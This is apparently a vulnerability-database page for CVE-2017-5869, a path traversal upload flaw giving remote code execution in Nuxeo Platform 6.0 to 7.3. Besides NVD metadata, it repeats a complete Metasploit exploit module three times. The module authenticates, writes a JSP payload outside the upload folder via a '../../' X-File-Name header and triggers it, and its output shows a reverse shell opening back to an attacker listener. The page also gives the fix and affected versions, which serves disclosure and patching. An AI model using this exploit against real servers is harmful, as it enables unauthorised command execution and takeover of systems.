ID CVE-2017-5869Type cveReporter cve@mitre.orgModified 2017-08-16T01:29:00
Description
Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.
{"id": "CVE-2017-5869", "bulletinFamily": "NVD", "title": "CVE-2017-5869", "description": "Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.", "published": "2017-03-24T14:59:00", "modified": "2017-08-16T01:29:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5869", "reporter": "cve@mitre.org", "references": ["https://sysdream.com/news/lab/2017-03-23-cve-2017-5869-nuxeo-platform-remote-code-execution/", "https://www.exploit-db.com/exploits/41748/", "http://www.securityfocus.com/bid/97083", "http://www.openwall.com/lists/oss-security/2017/03/23/6"], "cvelist": ["CVE-2017-5869"], "type": "cve", "lastseen": "2020-10-03T13:07:46", "edition": 3, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27452", "1337DAY-ID-27420"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106696"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141811"]}, {"type": "exploitdb", "idList": ["EDB-ID:41748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3BDE07924AD5019982D9337367D7DB4E"]}], "modified": "2020-10-03T13:07:46", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-10-03T13:07:46", "rev": 2}, "vulnersScore": 6.8}, "cpe": ["cpe:/a:nuxeo:nuxeo:7.1", "cpe:/a:nuxeo:nuxeo:7.3", "cpe:/a:nuxeo:nuxeo:7.2", "cpe:/a:nuxeo:nuxeo:6.0"], "affectedSoftware": [{"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "6.0"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.1"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.3"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:nuxeo:nuxeo:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:6.0:*:*:*:*:*:*:*"], "cwe": ["CWE-22"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:6.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2018-03-06T22:09:52", "description": "Exploit for jsp platform in category web applications", "edition": 1, "published": "2017-03-28T00:00:00", "title": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-28T00:00:00", "href": "https://0day.today/exploit/description/27452", "id": "1337DAY-ID-27452", "sourceData": "=begin\r\n# Description\r\n \r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n \r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n \r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n \r\n## Details\r\n \r\n**CVE ID**: CVE-2017-5869\r\n \r\n**Access Vector**: network\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-434\r\n \r\n**CVSS Base Score**: 8.8\r\n \r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n \r\n# Proof of Concept\r\n \r\nHere is a metasploit module to exploit this vulnerability:\r\n \r\n=end\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella <[email\u00a0protected]>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\r\n ], self.class)\r\n end\r\n \r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n \r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n \r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n \r\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\r\n session_cookie = res.get_cookies\r\n \r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n \r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n \r\n def exploit\r\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => '0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\r\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n \r\nend\r\n \r\n=begin\r\nModule output:\r\n \r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n \r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n \r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n \r\n# Vulnerable code\r\n \r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n \r\n# Fix\r\n \r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n \r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n \r\n# Affected versions\r\n \r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n \r\n# Unaffected versions\r\n \r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n \r\n# Credits\r\n \r\nRonan Kervella <[email\u00a0protected]>\r\n \r\n-- SYSDREAM Labs <[email\u00a0protected]> \r\nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1\r\n* Website: https://sysdream.com/ \r\n* Twitter: @sysdream\r\n=end\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27452"}, {"lastseen": "2018-02-19T15:24:46", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-03-25T00:00:00", "type": "zdt", "title": "Nuxeo Platform 6.x / 7.x Shell Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-25T00:00:00", "href": "https://0day.today/exploit/description/27420", "id": "1337DAY-ID-27420", "sourceData": "# Description\r\n\r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n\r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n\r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n\r\n## Details\r\n\r\n**CVE ID**: CVE-2017-5869\r\n\r\n**Access Vector**: network\r\n\r\n**Security Risk**: high\r\n\r\n**Vulnerability**: CWE-434\r\n\r\n**CVSS Base Score**: 8.8\r\n\r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n# Proof of Concept\r\n\r\nHere is a metasploit module to exploit this vulnerability:\r\n\r\n```ruby\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is vulnerable to an\r\nauthenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella\r\n<[email\u00a0protected]>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3',\r\n'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo\r\napplication', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the\r\nusername', ''])\r\n ], self.class)\r\n end\r\n\r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n\r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n\r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n\r\n fail_with(Failure::Unreachable, 'No response received from the\r\ntarget.') unless res\r\n session_cookie = res.get_cookies\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n'/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 &&\r\nres.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n\r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get\r\n#{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n\r\n def exploit\r\n print_status(\"Authenticating using\r\n#{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n'/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => '0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload')\r\nunless res && res.code == 200\r\n print_status(\"Executing the payload at\r\n#{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n\r\nend\r\n```\r\n\r\nModule output:\r\n\r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n\r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n\r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n\r\n# Vulnerable code\r\n\r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n\r\n# Fix\r\n\r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n\r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n\r\n# Affected versions\r\n\r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n\r\n# Unaffected versions\r\n\r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n\r\n# Credits\r\n\r\nRonan Kervella <[email\u00a0protected]>\r\n\r\n-- \r\nSYSDREAM Labs <[email\u00a0protected]>\r\n\r\nGPG :\r\n47D1 E124 C43E F992 2A2E\r\n1551 8EB4 8CD9 D5B2 59A1\r\n\r\n* Website: https://sysdream.com/\r\n* Twitter: @sysdream\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27420", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-03-27T23:16:58", "description": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit). CVE-2017-5869. Webapps exploit for JSP platform. Tags: Metasploit Framework", "published": "2017-03-27T00:00:00", "type": "exploitdb", "title": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-27T00:00:00", "id": "EDB-ID:41748", "href": "https://www.exploit-db.com/exploits/41748/", "sourceData": "=begin\r\n# Description\r\n\r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n\r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n\r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n\r\n## Details\r\n\r\n**CVE ID**: CVE-2017-5869\r\n\r\n**Access Vector**: network\r\n\r\n**Security Risk**: high\r\n\r\n**Vulnerability**: CWE-434\r\n\r\n**CVSS Base Score**: 8.8\r\n\r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n# Proof of Concept\r\n\r\nHere is a metasploit module to exploit this vulnerability:\r\n\r\n=end\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\r\n ], self.class)\r\n end\r\n\r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n\r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n\r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n\r\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\r\n session_cookie = res.get_cookies\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n\r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n\r\n def exploit\r\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => '0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\r\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n\r\nend\r\n\r\n=begin\r\nModule output:\r\n\r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n\r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n\r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n\r\n# Vulnerable code\r\n\r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n\r\n# Fix\r\n\r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n\r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n\r\n# Affected versions\r\n\r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n\r\n# Unaffected versions\r\n\r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n\r\n# Credits\r\n\r\nRonan Kervella <r.kervella@sysdream.com>\r\n\r\n-- SYSDREAM Labs <labs@sysdream.com> \r\nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 \r\n* Website: https://sysdream.com/ \r\n* Twitter: @sysdream \r\n=end", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41748/"}], "packetstorm": [{"lastseen": "2017-03-24T15:22:24", "description": "", "published": "2017-03-24T00:00:00", "type": "packetstorm", "title": "Nuxeo Platform 6.x / 7.x Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-24T00:00:00", "id": "PACKETSTORM:141811", "href": "https://packetstormsecurity.com/files/141811/Nuxeo-Platform-6.x-7.x-Shell-Upload.html", "sourceData": "`# Description \n \nNuxeo Platform is a content management system for enterprises (CMS). \nIt embeds an Apache Tomcat server, and can be managed through a web \ninterface. \n \nOne of its features allows authenticated users to import files to the \nplatform. \nBy crafting the upload request with a specific ``X-File-Name`` header, \none can successfuly upload a file at an 